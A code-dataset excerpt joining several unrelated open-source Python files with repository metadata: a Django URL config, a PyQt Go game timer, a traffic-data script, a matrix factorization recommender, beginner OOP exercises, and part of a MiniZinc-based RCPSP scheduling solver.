ClassSubjectFileUpdate, ClassSubjectFileDelete, AppointmentCreate, AppointmentUpdate, AppointmentDelete
app_name = 'klass'
urlpatterns = [
path('', class_detail, name='class-detail'),
path('<int:pk>/ficheiros/', ClassSubjectDetail.as_view(), name='subject-detail'),
path('<int:pk>/ficheiros/criar/', ClassSubjectFileCreate.as_view(), name='subject-file-create'),
path('<int:pk>/ficheiros/atualizar/', ClassSubjectFileUpdate.as_view(), name='subject-file-update'),
path('<int:pk>/ficheiros/remover/', ClassSubjectFileDelete.as_view(), name='subject-file-delete'),
path('<int:pk>/agenda/criar/', AppointmentCreate.as_view(), name='appointment-create'),
path('<int:pk>/agenda/atualizar', AppointmentUpdate.as_view(), name='appointment-update'),
path('<int:pk>/agenda/remover', AppointmentDelete.as_view(), name='appointment-delete')
]
| [
"andrematosdesousa@gmail.com"
] | andrematosdesousa@gmail.com |
ba211ff0592056913e625a227169202735893887 | ef5d0cc333958ba6f990d352f6a8fc4f7c19c854 | /Client/GoUI/GoTimer.py | 5a7a3e6586ea8b090774fdd59aca236a2a3f2187 | [] | no_license | PolyProgrammist/GoGame | cdbc50db0e1a910e7c6ba328b9cf5f22deba133d | 2d358b992bce6b015ad051ece948f33d8fd39304 | refs/heads/master | 2020-05-24T16:55:22.748626 | 2017-04-21T21:23:25 | 2017-04-21T21:23:25 | 84,861,279 | 0 | 0 | null | 2017-04-13T00:53:35 | 2017-03-13T18:32:27 | Python | UTF-8 | Python | false | false | 1,154 | py | from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import QFrame
from PyQt5.QtWidgets import QLCDNumber
class Timer:
    """Countdown clock for one player, displayed on a QLCDNumber.

    Starts at `initsec` seconds; each time the turn passes to this player
    (`go`), `gosec` extra seconds are granted (increment-style timing).
    """

    initsec = 30  # starting time budget, in seconds
    gosec = 10    # increment granted when the turn passes to this player

    def __init__(self, maingo, layout, turn):
        self.lcd = QLCDNumber()
        self.sec = self.initsec
        self.turn = turn
        self.updui()
        self.lcd.setFrameStyle(QFrame.NoFrame)
        self.maingo = maingo
        # Tick once per second on the Qt event loop.
        self.timer = QTimer(self.maingo.goui)
        self.timer.timeout.connect(self.count_time)
        self.timer.start(1000)
        layout.addWidget(self.lcd)

    def get_stime(self, seconds):
        """Format a second count as zero-padded MM:SS."""
        # Renamed locals: the original `min` shadowed the builtin.
        minutes, remainder = divmod(seconds, 60)
        return '{:0>2}'.format(minutes) + ':' + '{:0>2}'.format(remainder)

    def updui(self):
        """Refresh the LCD with the current remaining time."""
        self.lcd.display(self.get_stime(self.sec))

    def count_time(self):
        """One-second tick; only counts down during this player's turn."""
        if not self.turn:
            return
        self.sec -= 1
        self.updui()
        # hack: when time runs out on our turn, resign and stop ticking.
        if self.sec == 0 and self.maingo.protor.step == self.turn:
            self.maingo.protor.surrender()
            self.timer.stop()

    def go(self):
        """Toggle whose turn it is; grant the increment on gaining the turn."""
        self.turn = not self.turn
        if self.turn:
            self.sec += self.gosec
"pechkin350@gmail.com"
] | pechkin350@gmail.com |
54f187e9c5b501a8ed168a86047576f181f1f10c | dca0b858b7c8a9b153148ac0d403c47590889a97 | /main.py | 83d5a19f228d954474702c1f1dcdb1838e189fae | [] | no_license | m-walters/traffic-stgcnn | 6cb9f0c9f90e2c5793b8374b289d007946f11083 | db85e319db6902b7131c407bd27a44d98f1313e7 | refs/heads/master | 2020-08-28T04:35:05.057506 | 2019-11-14T17:16:57 | 2019-11-14T17:16:57 | 217,592,256 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,824 | py | import numpy as np
import os
import pandas as pd
import logman
import fluxGrid
# Conversion factors from degrees of longitude/latitude to kilometres.
# NOTE(review): fixed factors, presumably valid near Beijing's latitude
# (~40 N) where a degree of longitude spans fewer km -- confirm.
long2km = 1/0.011741652782473
lat2km = 1/0.008994627867046
if __name__ == "__main__":
    # Logger -- see the logman README for usage
    logfile = "run.log"
    sformat = '%(name)s : %(message)s'
    logger = logman.logman(__name__, "debug", sformat, logfile)
    logger.add_handler("info", "%(message)s")
    # Choose the analysis region; both bounding boxes are converted to km.
    fullArea = True
    if fullArea:
        # From Liang's road spreadsheets
        # Approximately 150x150 km
        xmin = 115.5148074 * long2km
        xmax = 117.26431366500 * long2km
        ymin = 39.42848884480 * lat2km
        ymax = 40.67874211840 * lat2km
        dxCell, dyCell = 1., 1. #in km
    else: #just to fifth ring
        # From Liang's slides, the fifth ring
        # Approximately 30x30 km
        xmin = 116.1904 * long2km
        xmax = 116.583642 * long2km
        ymin = 39.758029 * lat2km
        ymax = 40.04453 * lat2km
        dxCell, dyCell = 0.1, 0.1 #in km
    #TEMPORARY override of the cell size chosen above
    dxCell = 0.5
    dyCell = 0.5
    fluxgrid = fluxGrid.fluxgrid([xmin,xmax,ymin,ymax],dxCell,dyCell,logfile)
    data_dir = "/home/michael/msc/summer17/traffic/sample_data/processed_samples/"
    all_dir = os.listdir(data_dir)
    Nf = len(all_dir)
    cnt = 0
    # Process at most 10 sample files (early break below).
    for a_file in all_dir:
        if cnt==10: break
        cnt += 1
        logger.printl("info","\nProcessing batch "+str(cnt)+ " of "+str(Nf)+", file "+a_file+"...")
        data = pd.read_csv(data_dir+a_file, skiprows=1,
                names=['long','lat','unix70ms','dt','timegroup','day'])
        # NOTE(review): `long` is the Python 2 builtin -- this line raises
        # NameError on Python 3 (and N is unused afterwards).
        N = (long)(len(data.index))
        # Convert degree coordinates to km and rename to the x/y columns
        # that fluxgrid expects.
        data['long'] = data['long']*long2km
        data['lat'] = data['lat']*lat2km
        data = data.rename(columns={"long": "x", "lat": "y"}) #fluxgrid will want these
        fluxgrid.process_batch(data)
| [
"michaelwalters3000@gmail.com"
] | michaelwalters3000@gmail.com |
0f6cb983c70f431d11b0779f341c352f377f63d2 | 5d4f3105136808a2632058848861226acf7abda5 | /website/matrixfactorization.py | 5792302c9feaa7a282dfc238b1cf664d6f39056a | [] | no_license | SunTzuLombardi/movie-recommender | 49961e70401052a21dad7e6690bce8ee2ed063d3 | a1489dbdb30f1e13d990af33ee10991b500fa8fe | refs/heads/master | 2022-01-09T02:55:47.040287 | 2019-02-15T11:01:24 | 2019-02-15T11:01:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,861 | py | import numpy as np
def predict(global_bias, user_bias, item_bias, user_embedding, item_embedding, u, i):
    """Predicted rating for user u / item i: global + both biases + embedding dot."""
    interaction = np.dot(user_embedding[u], item_embedding[i])
    return global_bias + user_bias[u] + item_bias[i] + interaction
def train(ratings, k=40, learning_rate=0.0001, regularization=0, epochs=1):
    """Fit biased matrix factorization to a dense ratings matrix via SGD.

    Zero entries of `ratings` are treated as missing and skipped.
    Returns (global_bias, user_bias, item_bias, user_embedding, item_embedding).
    """
    n_users, n_items = ratings.shape
    user_embedding = np.random.normal(scale=1/k, size=(n_users, k))
    item_embedding = np.random.normal(scale=1/k, size=(n_items, k))
    # Global bias starts at the mean of the observed (non-zero) ratings.
    global_bias = np.mean(ratings[np.where(ratings != 0)])
    user_bias = np.zeros(n_users)
    item_bias = np.zeros(n_items)
    rows, cols = np.nonzero(ratings)
    for epoch in range(epochs):
        # Visit the observed entries in a fresh random order each epoch.
        p = np.random.permutation(len(rows))
        rows, cols = rows[p], cols[p]
        for u, i in zip(rows, cols):
            # Prediction error for this observation.
            e = ratings[u, i] - predict(global_bias, user_bias, item_bias,
                                        user_embedding, item_embedding, u, i)
            # (Removed: a per-step `loss` that was computed, including two
            # norms, but never used -- pure dead work in the hot loop.)
            # Standard SGD updates with L2 regularization.
            user_bias[u] += learning_rate * (e - regularization * user_bias[u])
            item_bias[i] += learning_rate * (e - regularization * item_bias[i])
            user_embedding[u] += learning_rate * (e * item_embedding[i] - regularization * user_embedding[u])
            item_embedding[i] += learning_rate * (e * user_embedding[u] - regularization * item_embedding[i])
    return global_bias, user_bias, item_bias, user_embedding, item_embedding
def matrixfactorization_predict(user, ratings):
    # Train on `ratings` and score every item for the LAST user row --
    # the caller is expected to have appended `user` as the final row.
    global_bias, user_bias, item_bias, user_embedding, item_embedding = train(ratings)
    # NOTE(review): only the embedding dot-products are used here; the
    # learned biases are dropped, unlike predict() -- confirm intentional.
    predictions = np.dot(user_embedding, item_embedding.T)[-1]
    for i in range(len(user)):
        if user[i] != 0:
            # Zero out items the user already rated so they are not recommended.
            predictions[i] = 0
    return predictions
"hladia199811@gmail.com"
] | hladia199811@gmail.com |
9cc87eddda144ed0c0936f3f7214858251fc8942 | 87c474b7fe909a11ee947bea8d3ae24e716fc53c | /pbo.py | d56c482c129018671e1a4542ed88383c0270eee1 | [] | no_license | fahrizzain91/pemrogramanbasisata | dc30857ddeae6e2f830168c413fe31762fe1aa6e | 25eaa81dd0ff16655c53a6692c9e8e6e9744bfae | refs/heads/master | 2020-05-04T18:27:40.386320 | 2019-04-03T19:50:40 | 2019-04-03T19:50:40 | 179,354,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,105 | py | #!/usr/bin/env python
# coding: utf-8
# In[10]:
class Kubus:
    """A cube described by the length of one edge (sisi)."""

    def __init__(self, s):
        self.sisi = s

    def tampilkansisi(self):
        """Print the edge length."""
        print(self.sisi)

    def luas(self):
        """Print the area of a single face."""
        print("Luas : ", self.sisi ** 2)

    def luaspermukaan(self):
        """Print the total surface area (six faces)."""
        face = self.sisi ** 2
        print("Luas permukaan :", face * 6)

    def volume(self):
        """Print the volume."""
        print("volume :", self.sisi ** 3)
# Demo: report every measurement of a cube with edge length 4.
kubus1 = Kubus(4)
kubus1.tampilkansisi()
kubus1.luas()
kubus1.luaspermukaan()
kubus1.volume()
# In[11]:
from datetime import datetime
# Capture the current year once at import time for age calculations.
sekarang = datetime.now()
tahun = sekarang.year
class Pegawai:
    """An employee: name, job title, daily wage, and birth year."""
    def __init__(self,n,j,g,lahir):
        self.nama = n
        self.jabatan = j
        self.gaji = g
        self.tahunlahir = lahir
    def tampilkan(self):
        # gaji is a daily figure; show the 30-day monthly total.
        print(self.nama,",",self.jabatan,",",self.gaji*30)
    def tampilkanumur(self):
        # Age by calendar year only (month/day ignored).
        print("Umur :",tahun - self.tahunlahir)
p1 = Pegawai("m.fahriz zain jannan","Direktur",500000,2000)
p1.tampilkan()
p1.tampilkanumur()
# In[3]:
class Mahasiswa:
    """A student: name, student id (nim), and GPA (ipk)."""
    def __init__(self,n,no,ip):
        self.nama = n
        self.nim = no
        self.ipk = ip
    def ceklayak(self):
        # Bidikmisi scholarship eligibility: GPA must be at least 3.
        if(self.ipk<3):
            print(self.nama,"tidak layak bidikmisi")
        else:
            print("Anda layak Bidikmisi")
    def datamhs(self):
        print(self.nama,",",self.nim,",",self.ipk)
m1 = Mahasiswa("M.fahriz zain jannan","180441100075",2.75)
m1.datamhs()
m1.ceklayak()
m2 = Mahasiswa("Siapa dia?","180441100030",3.5)
m2.datamhs()
m2.ceklayak()
# Default object equality is identity: distinct instances -> False.
print(m1==m2)
# In[1]:
from datetime import datetime
# Snapshot today's year/month/day for the exact-age calculation below.
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class pegawai:
    """Person record with full birth date; computes an exact current age."""
    def __init__(self, n, no, tl ,tg,bln, th):
        self.nama = n
        self.nim = no
        self.tempat_lahir = tl
        self.tanggal_lahir=tg
        self.bulan_lahir=bln
        self.tahun_lahir=th
    def user(self):
        print("nama",self.nama,"nim",self.nim)
    def prediksi_umur(self):
        # Year difference, minus one if this year's birthday is still ahead.
        self.usia=tahun-self.tahun_lahir
        if(self.bulan_lahir==bulan):
            if(self.tanggal_lahir>hari):
                self.usia=self.usia-1
        elif(self.bulan_lahir>bulan):
            self.usia=self.usia-1
        print("umur_sekarang",self.usia,"tahun")
pg1 = pegawai("zein","180441100075","pamekasan",8,6,2000)
pg1.user()
pg1.prediksi_umur()
# In[5]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class orang:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def perkenalkan_anda(self):
print("hello,saya", self.nama,"Nim",self.nim,"lahir_di",self.tempat_lahir,self.tanggal_lahir,self.bulan_lahir,self.tahun_lahir)
def prediksi_umur(self):
print("prediksi_Umur :",tahun - self.tahun_lahir,"")
def umur_sekarang(self):
self.usia=tahun-self.tahun_lahir
if(self.bulan_lahir==bulan):
if(self.tanggal_lahir>hari):
self.usia=self.usia-1
elif(self.bulan_lahir>bulan):
self.usia=self.usia-1
print("umur_sekarang",self.usia,"tahun")
org1 = orang("zein","180441100075","pamekasan",8,6,2000)
org1.perkenalkan_anda()
org1.prediksi_umur()
org1.umur_sekarang()
# In[2]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
class Mahasiswa:
def __init__(self,nim,nm):
self.npm = nim
self.nama = nm
def perkiraan_semester(self):
self.angkatan = "20"+self.npm[:2]
self.angkatan = int(self.angkatan)
self.smt = tahun - self.angkatan
if(bulan>=2 and bulan<=7):
if(self.smt ==1):
self.semester = "semester 2"
elif(self.smt ==2):
self.semester = "semester 4"
elif(self.smt ==3):
self.semester = "semester 6"
elif(self.smt ==4):
self.semester = "semester 8"
else:
self.semester = "semester tua"
if(bulan<2 and bulan>7):
if(self.smt ==1):
self.semester = "semester 1"
elif(self.smt ==2):
self.semester = "semester 3"
elif(self.smt ==3):
self.semester = "semester 5"
elif(self.smt ==4):
self.semester = "semester 7"
else:
self.semester = "semester tua"
def hasil(self):
print("nama : ",self.nama)
print("nim : ",self.npm)
print("Sekarang : ",self.semester,"\n")
m1 = Mahasiswa("180441100075","zein")
m1.perkiraan_semester()
m1.hasil()
m2=Mahasiswa("160441100075","tama")
m2.perkiraan_semester()
m2.hasil()
m3=Mahasiswa("180441100065","galih")
m3.perkiraan_semester()
m3.hasil()
# In[3]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class mahasiswa:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def perkenalan_saya(self):
print("hello,saya", self.nama,"Nim",self.nim,"lahir_di",self.tempat_lahir,self.tanggal_lahir,self.bulan_lahir,self.tahun_lahir)
def umur_sekarang(self):
print("preiksi_Umur :",tahun - self.tahun_lahir)
def prediksi_umur(self):
print("umur_saya :",tahun - self.tahun_lahir,"tahun",bulan - self.bulan_lahir,"bulan",hari - self.tanggal_lahir,"hari")
mhs1 = mahasiswa("zein","180441100075","pamekasan",8,6,2000)
mhs1.perkenalan_saya()
mhs1.umur_sekarang()
mhs1.prediksi_umur()
# In[4]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class orang:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def perkenalkan_anda(self):
print("hello,saya", self.nama,"Nim",self.nim,"lahir_di",self.tempat_lahir,self.tanggal_lahir,self.bulan_lahir,self.tahun_lahir)
def umur_sekarang(self):
print("preiksi_Umur :",tahun - self.tahun_lahir)
def prediksi_umur(self):
self.usia=tahun-self.tahun_lahir
if(self.bulan_lahir==bulan):
if(self.tanggal_lahir>hari):
self.usia=self.usia-1
elif(self.bulan_lahir>bulan):
self.usia=self.usia-1
print("umur_sekarang",self.usia,"tahun")
org1 = orang("zein","180441100075","pamekasan",8,6,2000)
org1.perkenalkan_anda()
org1.umur_sekarang()
org1.prediksi_umur()
# In[5]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class pegawai:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def user(self):
print("nama",self.nama,"nim",self.nim)
def prediksi_umur(self):
self.usia=tahun-self.tahun_lahir
if(self.bulan_lahir==bulan):
if(self.tanggal_lahir>hari):
self.usia=self.usia-1
elif(self.bulan_lahir>bulan):
self.usia=self.usia-1
print("umur_sekarang",self.usia,"tahun")
pg1 = pegawai("zein","180441100075","pamekasan",8,6,2000)
pg1.user()
pg1.prediksi_umur()
# In[6]:
class shark():
def swim(self):
print("the shark is swim")
def swim_backwards(self):
print("the shark cannot swim backwars,but can sink backward")
def skalaton(self):
print("the shark skelaton is mode of cartilago")
class clamfish():
def swim(self):
print("the clam fish is swim")
def swim_backwards(self):
print("the clamfish can swim backwars,but can sink backward")
def skalaton(self):
print("the clamfish skelaton is mode of bone")
abc=shark()
abc.skalaton()
easy=clamfish()
easy.skalaton()
for fish in(abc,easy):
fish.swim()
fish.swim_backwards()
fish.skalaton()
# In[7]:
class shark():
def swim(self):
print("the shark is swim")
def swim_backwards(self):
print("the shark cannot swim backwars,but can sink backward")
def skalaton(self):
print("the shark skelaton is mode of cartilago")
class clamfish():
def swim(self):
print("the clam fish is swim")
def swim_backwards(self):
print("the clamfish can swim backwars,but can sink backward")
def skalaton(self):
print("the clamfish skelaton is mode of bone")
abc=shark()
abc.skalaton()
easy=clamfish()
easy.skalaton()
# In[8]:
class user:
def __init__(self,n):
self._first_name=n
def p(self):
print ("hello",self._first_name)
class programer(user):
def __init__(self,n,last):
user.__init__(self,n)
self.last_name=last
def P(self):
print ("hello",self._first_name+" "+self.last_name)
brian=programer("zein","baim")
brian.P()
# In[9]:
class binatanng:
def __init__(self,nama):
self.nama=nama
def cara_berjalan(self):
raise NotImplementedError("sub class must implemented abstrak metho")
class kucing(binatanng):
def cara_berjalan(self):
return "berjalan merangkak"
def bersuara(self):
return "meong"
class anjing (binatanng):
def cara_berjalan(self):
return "berjalan merangkak"
def bersuara(self):
return "gog"
class ular (binatanng):
def cara_berjalan(self):
return "merayap"
def bersuara(self):
return "essst"
binatanng=[anjing('bull'),
kucing('anggora'),
ular('cobra')]
for binatanng in binatanng:
print(binatanng.nama,":",binatanng.bersuara(),":",binatanng.cara_berjalan())
# In[ ]:
| [
"zeinbaim4@gmail.com"
] | zeinbaim4@gmail.com |
ed84bab6c4de84ceb611a8624e6fe58f20161012 | 10581444baa6970a92a587d5cb28052387c7ae3f | /generators_size.py | b2a7e0317c339f6bb18d2d34add6dd99786b522b | [] | no_license | KKGITHUBNET/Python | adac034c2dbeca290cad3e00aeb00f22286f9e41 | be26917e4dcd822d703d2d75240712d403bec281 | refs/heads/master | 2022-11-13T14:23:57.415628 | 2020-07-04T20:35:43 | 2020-07-04T20:35:43 | 278,402,376 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | import sys
def my_range(n: int):
start=0
while start<n:
yield start
start += 1
big_range = my_range(5)
# big_range = range(5)
print("Big Range is {} bytes".format(sys.getsizeof(big_range)))
# creating a list containing all the values in big_range
big_list=[]
for val in big_range:
big_list.append(val)
print("Big List is {} bytes".format(sys.getsizeof(big_list)))
print(big_range)
print(big_list) | [
"noreply@github.com"
] | noreply@github.com |
89db78394769d2f53cdc241dbc7981412dde67f7 | 2d14aa082e33f3c9d2344ea6811a5b18ec906607 | /skdecide/discrete_optimization/rcpsp/solver/cp_solvers.py | 0e6d401ed2b4eb7947aac1cc87f569ee91c950c7 | [
"MIT"
] | permissive | walter-bd/scikit-decide | 4c0b54b7b2abdf396121cd256d1f931f0539d1bf | d4c5ae70cbe8b4c943eafa8439348291ed07dec1 | refs/heads/master | 2023-07-30T14:14:28.886267 | 2021-08-30T14:16:30 | 2021-09-03T06:46:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,649 | py | # Copyright (c) AIRBUS and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
from dataclasses import InitVar
from typing import Union, List
from skdecide.discrete_optimization.generic_tools.cp_tools import CPSolver, ParametersCP, CPSolverName,\
map_cp_solver_name
from skdecide.discrete_optimization.generic_tools.do_problem import ParamsObjectiveFunction, \
build_aggreg_function_and_params_objective
from skdecide.discrete_optimization.generic_tools.result_storage.result_storage import ResultStorage
from skdecide.discrete_optimization.rcpsp.rcpsp_model import RCPSPModel, RCPSPSolution, \
RCPSPModelCalendar, PartialSolution
from minizinc import Instance, Model, Solver
import json
from datetime import timedelta
import os
# Directory of this module: the MiniZinc model files are resolved relative to it.
this_path = os.path.dirname(os.path.abspath(__file__))
# Map from model flavour to the MiniZinc model file implementing it.
# "single"/"multi" are single- vs multi-mode RCPSP; "single-preemptive" allows
# splitting tasks; the "-calendar" variants additionally model time-varying
# resource capacity; "modes" is a mode-assignment satisfaction model
# (no scheduling), used by CP_MRCPSP_MZN_MODES.
files_mzn = {"single": os.path.join(this_path, "../minizinc/rcpsp_single_mode_mzn.mzn"),
             "single-preemptive": os.path.join(this_path, "../minizinc/rcpsp_single_mode_mzn_preemptive.mzn"),
             "multi": os.path.join(this_path, "../minizinc/rcpsp_multi_mode_mzn.mzn"),
             "multi-no-bool": os.path.join(this_path, "../minizinc/rcpsp_multi_mode_mzn_no_bool.mzn"),
             "multi-calendar": os.path.join(this_path, "../minizinc/rcpsp_multi_mode_mzn_calendar.mzn"),
             "multi-calendar-boxes": os.path.join(this_path, "../minizinc/rcpsp_mzn_calendar_boxes.mzn"),
             "modes": os.path.join(this_path, "../minizinc/mrcpsp_mode_satisfy.mzn")}
class RCPSPSolCP:
    """Custom minizinc output type holding one CP solution.

    Instances are built by the minizinc bindings (this class is assigned to
    ``model.output_type``): ``objective`` receives the objective value and
    every other output variable of the model (e.g. ``s``, ``start``, ``mrun``)
    is collected into ``self.dict`` for later decoding by
    ``retrieve_solutions``.
    """
    objective: int
    # Raw minizinc output item; not used by this holder.
    __output_item: InitVar[str] = None

    def __init__(self, objective, _output_item, **kwargs):
        self.objective = objective
        # Keep all remaining decision-variable arrays keyed by their model name.
        self.dict = kwargs
        # Fix: removed the unconditional debug print that fired for every
        # solution parsed by minizinc (noisy side effect in library code).

    def check(self) -> bool:
        """Validation hook called by minizinc; accept every solution."""
        return True
class CP_RCPSP_MZN(CPSolver):
    """CP solver for the single-mode RCPSP, backed by the MiniZinc models
    ``files_mzn["single"]`` / ``files_mzn["single-preemptive"]``.

    The solver builds a minizinc ``Instance`` from ``rcpsp_model`` data,
    optionally posts constraints derived from a ``PartialSolution``, runs the
    chosen CP backend and converts the resulting start times into
    ``RCPSPSolution`` objects wrapped in a ``ResultStorage``.
    """
    def __init__(self, rcpsp_model: RCPSPModel,
                 cp_solver_name: CPSolverName=CPSolverName.CHUFFED,
                 params_objective_function: ParamsObjectiveFunction=None, **kwargs):
        self.rcpsp_model = rcpsp_model
        # The minizinc Instance is built lazily by init_model().
        self.instance: Instance = None
        self.cp_solver_name = cp_solver_name
        self.key_decision_variable = ["s"] # For now, I've put the var name of the CP model (not the rcpsp_model)
        # Aggregation callables turning the evaluation dict of a solution into
        # a single scalar fitness, per the (possibly defaulted) objective setup.
        self.aggreg_sol, self.aggreg_from_dict_values, self.params_objective_function = \
            build_aggreg_function_and_params_objective(self.rcpsp_model,
                                                       params_objective_function=params_objective_function)

    def init_model(self, **args):
        """Build the minizinc ``Instance`` for the single-mode model.

        Keyword args:
            model_type: "single" (default) or "single-preemptive".
            nb_preemptive: number of preemptive parts per task
                (only read for "single-preemptive", default 2).
            output_type: if truthy, solutions are parsed into ``RCPSPSolCP``.
            partial_solution: optional ``PartialSolution`` whose hints are
                posted as hard constraints on the start-time array ``s``.
        """
        model_type = args.get("model_type", "single")
        if model_type == "single-preemptive":
            nb_preemptive = args.get("nb_preemptive", 2)
        model = Model(files_mzn[model_type])
        custom_output_type = args.get("output_type", False)
        if custom_output_type:
            model.output_type = RCPSPSolCP
            self.custom_output_type = True
        solver = Solver.lookup(map_cp_solver_name[self.cp_solver_name])
        instance = Instance(solver, model)
        if model_type == "single-preemptive":
            instance["nb_preemptive"] = nb_preemptive
            # TODO : make this as options.
            instance["possibly_preemptive"] = [True for task in self.rcpsp_model.mode_details]
            instance["max_preempted"] = 3
        # Number of resources and their (constant) capacities, sorted for a
        # deterministic resource index order.
        n_res = len(list(self.rcpsp_model.resources.keys()))
        instance["n_res"] = n_res
        sorted_resources = sorted(self.rcpsp_model.resources_list)
        self.resources_index = sorted_resources
        rc = [int(self.rcpsp_model.resources[r])
              for r in sorted_resources]
        instance["rc"] = rc
        # Tasks include the two dummy source/sink jobs (hence +2).
        n_tasks = self.rcpsp_model.n_jobs + 2
        instance["n_tasks"] = n_tasks
        sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
        # Single-mode model: durations and resource requests come from mode 1.
        d = [int(self.rcpsp_model.mode_details[key][1]['duration']) for key in sorted_tasks]
        instance["d"] = d
        # rr[resource][task] = request of that task (mode 1) on that resource.
        rr = []
        index = 0
        for res in sorted_resources:
            rr.append([])
            for task in sorted_tasks:
                rr[index].append(int(self.rcpsp_model.mode_details[task][1][res]))
            index += 1
        instance["rr"] = rr
        # Precedence successors per task.
        suc = [set(self.rcpsp_model.successors[task]) for task in sorted_tasks]
        instance["suc"] = suc
        self.instance = instance
        # Encode the partial solution hints as extra MiniZinc constraint strings
        # over the start-time array "s".
        p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
        if p_s is not None:
            constraint_strings = []
            if p_s.start_times is not None:
                # Fix given start times exactly.
                for task in p_s.start_times:
                    string = "constraint s[" + str(task) + "] == " + str(p_s.start_times[task]) + ";\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.partial_permutation is not None:
                # Consecutive tasks of the permutation must start in order.
                for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
                    string = "constraint s[" + str(t1) + "] <= s[" + str(t2) + "];\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.list_partial_order is not None:
                for l in p_s.list_partial_order:
                    for t1, t2 in zip(l[:-1], l[1:]):
                        string = "constraint s[" + str(t1) + "] <= s[" + str(t2) + "];\n"
                        self.instance.add_string(string)
                        constraint_strings += [string]
            if p_s.start_together is not None:
                # Pairs of tasks forced to start simultaneously.
                for t1, t2 in p_s.start_together:
                    string = "constraint s[" + str(t1) + "] == s[" + str(t2) + "];\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.start_after_nunit is not None:
                # t2 starts at least `delta` units after t1 starts.
                for t1, t2, delta in p_s.start_after_nunit:
                    string = "constraint s[" + str(t2) + "] >= s[" + str(t1) + "]+"+str(delta)+";\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.start_at_end_plus_offset is not None:
                # t2 starts at least `delta` units after t1 ends (s[t1]+d[t1]).
                for t1, t2, delta in p_s.start_at_end_plus_offset:
                    string = "constraint s[" + str(t2) + "] >= s[" + str(t1) + "]+d["+str(t1)+"]+"+str(delta)+";\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.start_at_end is not None:
                # t2 starts exactly when t1 ends.
                for t1, t2 in p_s.start_at_end:
                    string = "constraint s[" + str(t2) + "] == s[" + str(t1) + "]+d["+str(t1)+"];\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]

    def retrieve_solutions(self, result, parameters_cp: ParametersCP=ParametersCP.default())->ResultStorage:
        """Convert a minizinc result into a ``ResultStorage`` of RCPSPSolution.

        Handles both single-result and intermediate-solutions mode, and both
        the custom ``RCPSPSolCP`` output type and raw minizinc records: in each
        case the start times are read from model variable "s".
        """
        intermediate_solutions = parameters_cp.intermediate_solution
        best_solution = None
        best_makespan = -float("inf")
        list_solutions_fit = []
        starts = []
        if intermediate_solutions:
            for i in range(len(result)):
                if isinstance(result[i], RCPSPSolCP):
                    starts += [result[i].dict["s"]]
                else:
                    starts += [result[i, "s"]]
        else:
            if isinstance(result, RCPSPSolCP):
                starts += [result.dict["s"]]
            else:
                starts = [result["s"]]
        for start_times in starts:
            # Rebuild a schedule: task ids are 1-based, durations come from
            # mode 1 (single-mode model).
            rcpsp_schedule = {}
            for k in range(len(start_times)):
                rcpsp_schedule[k + 1] = {'start_time': start_times[k],
                                         'end_time': start_times[k]
                                         + self.rcpsp_model.mode_details[k + 1][1]['duration']}
            sol = RCPSPSolution(problem=self.rcpsp_model,
                                rcpsp_schedule=rcpsp_schedule, rcpsp_schedule_feasible=True)
            objective = self.aggreg_from_dict_values(self.rcpsp_model.evaluate(sol))
            # Track the best according to the aggregated fitness (higher is better).
            if objective > best_makespan:
                best_makespan = objective
                best_solution = sol.copy()
            list_solutions_fit += [(sol, objective)]
        result_storage = ResultStorage(list_solution_fits=list_solutions_fit,
                                       best_solution=best_solution,
                                       mode_optim=self.params_objective_function.sense_function,
                                       limit_store=False)
        return result_storage

    def solve(self, parameters_cp: ParametersCP=ParametersCP.default(), **args):
        """Run the CP backend and return a ``ResultStorage``, or None on failure.

        Extra ``args`` are forwarded to ``init_model`` on the first call.
        """
        if self.instance is None:
            self.init_model(**args)
        timeout = parameters_cp.TimeLimit
        intermediate_solutions = parameters_cp.intermediate_solution
        try:
            result = self.instance.solve(timeout=timedelta(seconds=timeout),
                                         intermediate_solutions=intermediate_solutions)
        except Exception as e:
            # NOTE(review): any solver failure is swallowed and reported on
            # stdout; the caller only sees None.
            print(e)
            return None
        verbose = args.get("verbose", False)
        if verbose:
            print(result.status)
            print(result.statistics["solveTime"])
        return self.retrieve_solutions(result, parameters_cp=parameters_cp)
class CP_MRCPSP_MZN(CPSolver):
    """CP solver for the multi-mode RCPSP, backed by the MiniZinc models
